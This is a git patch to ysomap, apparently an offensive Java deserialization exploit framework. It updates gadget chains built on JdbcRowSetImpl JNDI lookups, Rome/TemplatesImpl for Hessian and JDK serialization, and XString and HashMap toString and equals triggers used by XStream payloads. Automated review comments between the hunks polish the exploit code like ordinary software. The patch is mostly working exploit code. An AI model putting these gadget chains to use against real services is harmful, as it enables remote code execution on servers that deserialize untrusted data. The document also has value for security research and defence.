From b1ef4a6aeeccc06f5c42735615597b51ff8c6cc7 Mon Sep 17 00:00:00 2001
From: wh1t3p1g
Date: Sat, 14 Oct 2023 17:46:45 +0800
Subject: [PATCH] update Rome1
---
 .../bullets/jdk/JdbcRowSetImplBullet.java | 12 +++++
 .../java/ysomap/core/util/CipherHelper.java | 22 +++++++++
 .../java/ysomap/core/util/PayloadHelper.java | 45 ++++++++++++++++++-
 .../hessian/{Rome.java => Rome1.java} | 29 ++++++------
 ...pringPartiallyComparableAdvisorHolder.java | 2 +-
 .../java/ysomap/payloads/hessian/XBean.java | 2 +-
 .../payloads/xstream/LazyValueForXStream.java | 2 +-
 .../payloads/xstream/XMLMessagePacket.java | 2 +-
 .../ysomap/payloads/xstream/XercesValue.java | 2 +-
 9 files changed, 95 insertions(+), 23 deletions(-)
 rename core/src/main/java/ysomap/payloads/hessian/{Rome.java => Rome1.java} (76%)
diff --git a/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java b/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java
index f0cf3e0..dc51bf1 100644
--- a/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java
+++ b/core/src/main/java/ysomap/bullets/jdk/JdbcRowSetImplBullet.java
@@ -4,6 +4,9 @@
 import ysomap.bullets.AbstractBullet;
 import ysomap.bullets.Bullet;
 import ysomap.common.annotation.*;
+import ysomap.core.util.ReflectionHelper;
+
+import java.util.Vector;
 /**
 * @author wh1t3P1g
@@ -26,6 +29,15 @@ public class JdbcRowSetImplBullet extends AbstractBullet {
 public JdbcRowSetImpl getObject() throws Exception {
 JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
 jdbcRowSet.setDataSourceName(jndiURL);
+
+ Vector v = new Vector();
+ v.add("");
+ ReflectionHelper.setFieldValue(jdbcRowSet, "fetchDir", 1);
+ ReflectionHelper.setFieldValue(jdbcRowSet, "concurrency", 1);
+ ReflectionHelper.setFieldValue(jdbcRowSet, "rowSetType", 1);
+ ReflectionHelper.setFieldValue(jdbcRowSet, "iMatchColumns", null);
+ ReflectionHelper.setFieldValue(jdbcRowSet, "strMatchColumns", v);
+ ReflectionHelper.setFieldValue(jdbcRowSet, "resBundle", null);
 return jdbcRowSet;
 }
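Review bot: `Vector v = new Vector();` in getObject() is a raw type, so `v.add("")` compiles with an unchecked warning; `Vector<String> v = new Vector<>();` builds the same runtime object and lets the compiler check the element type. The six `ReflectionHelper.setFieldValue` calls that follow were taken out of pack() in the renamed Rome payload (see that file's hunk), so they now run for every caller of this bullet rather than for one payload; a short comment above the block saying why the fields are preset, plus a line in the commit message, would make that wider scope visible. The literal `1` is repeated for three different fields and would read better as named constants.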
diff --git a/core/src/main/java/ysomap/core/util/CipherHelper.java b/core/src/main/java/ysomap/core/util/CipherHelper.java
index 854f005..29e96ce 100644
--- a/core/src/main/java/ysomap/core/util/CipherHelper.java
+++ b/core/src/main/java/ysomap/core/util/CipherHelper.java
@@ -3,6 +3,7 @@
 import javax.crypto.Cipher;
 import javax.crypto.spec.IvParameterSpec;
 import javax.crypto.spec.SecretKeySpec;
+import java.security.Key;
 /**
 * @author wh1t3P1g
@@ -21,4 +22,25 @@ public static byte[] encrypt(byte[] plain, byte[] key, byte[] iv){
 return null;
 }
 }
+
+ public static byte[] decrypt(byte[] plain, String key, byte[] iv){
+ try{
+ // AES/GCM/NoPadding
+ // AES/ECB/PKCS5Padding
+ // AES/CBC/PKCS5Padding
+ Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+ Key speckey = new SecretKeySpec(key.getBytes(), "AES");
+ if(iv != null){
+ IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
+ cipher.init(Cipher.DECRYPT_MODE, speckey, ivParameterSpec);
+ }else{
+ cipher.init(Cipher.DECRYPT_MODE, speckey);
+ }
+
+ return cipher.doFinal(plain);
+ }catch (Exception e){
+ e.printStackTrace();
+ return null;
+ }
+ }
 }
diff --git a/core/src/main/java/ysomap/core/util/PayloadHelper.java b/core/src/main/java/ysomap/core/util/PayloadHelper.java
index 6d3886c..285b13a 100755
--- a/core/src/main/java/ysomap/core/util/PayloadHelper.java
+++ b/core/src/main/java/ysomap/core/util/PayloadHelper.java
@@ -129,7 +129,13 @@ public static HashSet makeHashSetWithEntry(Object entry) throws NoSuchFieldExcep
 return set;
 }
- // triger compareTo function
+ /**
+ * trigger a.compare(b)
+ * @param a
+ * @param b
+ * @return
+ * @throws Exception
+ */
 public static Object makePriorityQueue(Object a, Object b) throws Exception {
 // create queue with numbers and basic comparator
 final PriorityQueue queue = new PriorityQueue(2);
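Review bot: In the added CipherHelper.decrypt(), `key.getBytes()` encodes the key with the platform default charset, so the same key string can produce different AES key bytes on different hosts; use `key.getBytes(StandardCharsets.UTF_8)` with the matching `java.nio.charset.StandardCharsets` import, or take `byte[] key` as the existing encrypt() does. The `else` branch cannot succeed with the hard-coded `AES/CBC/PKCS5Padding`: a CBC cipher initialised for decryption without an IV throws InvalidKeyException, so a null `iv` always ends in the catch block and a `null` return; either reject a null IV up front with an IllegalArgumentException or make the transformation a parameter so the commented-out modes are actually reachable. The first parameter carries ciphertext but is named `plain`, and `e.printStackTrace(); return null;` hides the failure reason from the caller, who cannot tell a bad key from bad padding.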
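Review bot: The Javadoc added above makePriorityQueue in PayloadHelper says `trigger a.compare(b)`, while the comment it replaces named compareTo; the method body continues outside the hunk, so which call the queue really makes cannot be checked here, but the summary should name the method that is invoked. The `@param a`, `@param b`, `@return` and `@throws Exception` tags are empty and only generate doclint warnings; either fill them in (for example `@return the populated PriorityQueue`) or drop them. The same empty tags appear in the Javadoc added for makeTreeSetWithXStringToStringTrigger, makeHashmapEqualsTrigger and makeXStringToStringTrigger in the later hunks of this file.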
@@ -143,7 +149,13 @@ public static Object makePriorityQueue(Object a, Object b) throws Exception {
 return queue;
 }
- public static Object makeTreeSetWithXString(Object obj) throws Exception {
+ /**
+ * trigger obj.toString for non-serializable payload
+ * @param obj
+ * @return
+ * @throws Exception
+ */
+ public static Object makeTreeSetWithXStringToStringTrigger(Object obj) throws Exception {
 Object rdnEntry1 = ReflectionHelper.newInstance("javax.naming.ldap.Rdn$RdnEntry", null);
 ReflectionHelper.setFieldValue(rdnEntry1, "type", "ysomap");
 ReflectionHelper.setFieldValue(rdnEntry1, "value", new XString("test"));
@@ -295,6 +307,35 @@ public static Object makeReadObjectToStringTrigger(Object obj) throws Exception
 return list;
 }
+ /**
+ * trigger obj2.equals(obj1)
+ * @param obj1
+ * @param obj2
+ * @return
+ * @throws Exception
+ */
+ public static Object makeHashmapEqualsTrigger(Object obj1, Object obj2) throws Exception {
+ Map map1 = new HashMap<>();
+ Map map2 = new HashMap<>();
+ map1.put("yy", obj1);
+ map1.put("zZ", obj2);
+
+ map2.put("yy", obj2);
+ map2.put("zZ", obj1);
+ return makeMap(map1, map2);
+ }
+
+ /**
+ * trigger obj.toString()
+ * @param obj
+ * @return
+ * @throws Exception
+ */
+ public static Object makeXStringToStringTrigger(Object obj) throws Exception {
+ XString xString = new XString("ysomap");
+ return makeHashmapEqualsTrigger(obj, xString);
+ }
+
 /**
 * 用于创造一个拥有同样hash的对象
 * 这样在map.put过程中将触发equal函数
diff --git a/core/src/main/java/ysomap/payloads/hessian/Rome.java b/core/src/main/java/ysomap/payloads/hessian/Rome1.java
similarity index 76%
rename from core/src/main/java/ysomap/payloads/hessian/Rome.java
rename to core/src/main/java/ysomap/payloads/hessian/Rome1.java
index 684ede9..743eafa 100644
--- a/core/src/main/java/ysomap/payloads/hessian/Rome.java
+++ b/core/src/main/java/ysomap/payloads/hessian/Rome1.java
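Review bot: makeHashmapEqualsTrigger declares `Map map1 = new HashMap<>();` and `Map map2 = new HashMap<>();` as raw types; `Map<String, Object>` on both removes the unchecked `put` warnings without changing the objects that are built. The key literals `"yy"` and `"zZ"` are used with no explanation, so a comment stating why exactly these two strings are required would keep a later edit from changing them by accident. The Javadoc states the call direction as `obj2.equals(obj1)`, which depends on makeMap, defined outside this hunk, so that claim is worth confirming against it. The method name also spells `Hashmap` where the class is `HashMap`.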
@@ -6,18 +6,18 @@
 import ysomap.core.util.PayloadHelper;
 import ysomap.core.util.ReflectionHelper;
-import java.util.Vector;
+import javax.xml.transform.Templates;
 /**
 * @author wh1t3p1g
 * @since 2021/8/5
 */
 @Payloads
-@Authors({ Authors.MBECHLER })
-@Targets({Targets.HESSIAN})
-@Require(bullets = {"JdbcRowSetImplBullet"},param = false)
+@Authors({ Authors.MBECHLER, Authors.whocansee})
+@Targets({Targets.HESSIAN, Targets.JDK})
+@Require(bullets = {"JdbcRowSetImplBullet", "TemplatesImplBullet"},param = false)
 @Dependencies({"com.rometools:rome:1.11.1"})
-public class Rome extends HessianPayload{
+public class Rome1 extends HessianPayload{
 @Override
 public Bullet getDefaultBullet(Object... args) throws Exception {
@@ -26,17 +26,14 @@ public Bullet getDefaultBullet(Object... args) throws Exception {
 @Override
 public Object pack(Object obj) throws Exception {
- Vector v = new Vector();
- v.add("");
- ReflectionHelper.setFieldValue(obj, "fetchDir", 1);
- ReflectionHelper.setFieldValue(obj, "concurrency", 1);
- ReflectionHelper.setFieldValue(obj, "rowSetType", 1);
- ReflectionHelper.setFieldValue(obj, "iMatchColumns", null);
- ReflectionHelper.setFieldValue(obj, "strMatchColumns", v);
- ReflectionHelper.setFieldValue(obj, "resBundle", null);
+ Object stringBean = null;
+ if(obj instanceof Templates){
+ stringBean = makeStringBean(Templates.class, obj);
+ }else{
+ Class type = obj.getClass();
+ stringBean = makeStringBean(type, obj);
+ }
- Class type = obj.getClass();
- Object stringBean = makeStringBean(type, obj);
 Object equalsBean = makeEqualsBean(makeStringBeanClass(), stringBean);
 // ObjectBean delegate = new ObjectBean(type, obj);
@@ -46,7 +43,7 @@ public Object pack(Object obj) throws Exception {
 return PayloadHelper.makeMap(equalsBean, "");
 // return PayloadHelper.makeMap(root, root);
- // using XString triger to ToStringBean also work
+ // using XString trigger to ToStringBean also work
 }
 public Class makeStringBeanClass() throws ClassNotFoundException {
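Review bot: `Authors.whocansee` in the new `@Authors` line is lower-case while its neighbour `Authors.MBECHLER` follows the UPPER_SNAKE_CASE constant convention; the Authors class is not part of this patch, so the constant was presumably added elsewhere, and `Authors.WHOCANSEE` would be the consistent name. The class now lists `Targets.JDK` in `@Targets` but still `extends HessianPayload` and stays in the `hessian` package, which the annotations alone do not explain. The class Javadoc carries only `@author` and `@since 2021/8/5`; one sentence saying what distinguishes Rome1 from the former Rome class would document the rename.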
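Review bot: In pack(), `Object stringBean = null;` followed by an if/else that calls makeStringBean in both branches leaves a dead initial value and duplicates the call; only the type argument differs, so the block can be written as `Class type = obj instanceof Templates ? Templates.class : obj.getClass();` followed by `Object stringBean = makeStringBean(type, obj);`. The raw `Class` could become `Class<?>` if makeStringBean's parameter type, which is not shown here, allows it. pack() starts inside this hunk and continues past its end.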
diff --git a/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java b/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java
index 1852c12..d770cda 100644
--- a/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java
+++ b/core/src/main/java/ysomap/payloads/hessian/SpringPartiallyComparableAdvisorHolder.java
@@ -43,6 +43,6 @@ public Object pack(Object obj) throws Exception {
 .forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder");
 Object pcah = ReflectionHelper.createWithoutConstructor(pcahCl);
 ReflectionHelper.setFieldValue(pcah, "advisor", advisor);
- return PayloadHelper.makeTreeSetWithXString(pcah);
+ return PayloadHelper.makeTreeSetWithXStringToStringTrigger(pcah);
 }
 }
diff --git a/core/src/main/java/ysomap/payloads/hessian/XBean.java b/core/src/main/java/ysomap/payloads/hessian/XBean.java
index 18adc68..acc071a 100644
--- a/core/src/main/java/ysomap/payloads/hessian/XBean.java
+++ b/core/src/main/java/ysomap/payloads/hessian/XBean.java
@@ -31,6 +31,6 @@ public Object pack(Object obj) throws Exception {
 Context ctx = ReflectionHelper.createWithoutConstructor(WritableContext.class);
 ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", obj, ctx);
 ReflectionHelper.setFieldValue(binding, "boundObj", null);
- return PayloadHelper.makeTreeSetWithXString(binding);
+ return PayloadHelper.makeTreeSetWithXStringToStringTrigger(binding);
 }
 }
diff --git a/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java b/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java
index 4c87e9f..9cc1818 100644
--- a/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java
+++ b/core/src/main/java/ysomap/payloads/xstream/LazyValueForXStream.java
@@ -53,7 +53,7 @@ public Object pack(Object obj) throws Exception {
 ReflectionHelper.newInstance("javax.swing.MultiUIDefaults", new Object[]{new UIDefaults[]{uiDefaults}});
 uiDefaults.put("lazyValue", obj);
- return PayloadHelper.makeTreeSetWithXString(multiUIDefaults);
+ return PayloadHelper.makeTreeSetWithXStringToStringTrigger(multiUIDefaults);
 }
 }
diff --git a/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java b/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java
index b1b2d1f..8a7bb61 100644
--- a/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java
+++ b/core/src/main/java/ysomap/payloads/xstream/XMLMessagePacket.java
@@ -65,6 +65,6 @@ public Object pack(Object obj) throws Exception {
 ReflectionHelper.setFieldValue(msg, "bodyParts", new ArrayList());
 ReflectionHelper.setFieldValue(packet, "satellites", null);
 ReflectionHelper.setFieldValue(packet, "viewthis", null);
- return PayloadHelper.makeTreeSetWithXString(packet);
+ return PayloadHelper.makeTreeSetWithXStringToStringTrigger(packet);
 }
 }
diff --git a/core/src/main/java/ysomap/payloads/xstream/XercesValue.java b/core/src/main/java/ysomap/payloads/xstream/XercesValue.java
index bcf1b9a..89ac57c 100644
--- a/core/src/main/java/ysomap/payloads/xstream/XercesValue.java
+++ b/core/src/main/java/ysomap/payloads/xstream/XercesValue.java
@@ -86,7 +86,7 @@ public Object pack(Object obj) throws Exception {
 XRTreeFrag xrTreeFrag = new XRTreeFrag(1, new XPathContext());
 ReflectionHelper.setFieldValue(xrTreeFrag, "m_DTMXRTreeFrag", dtmxrTreeFrag);
- return PayloadHelper.makeTreeSetWithXString(xrTreeFrag);
+ return PayloadHelper.makeTreeSetWithXStringToStringTrigger(xrTreeFrag);
 }
 }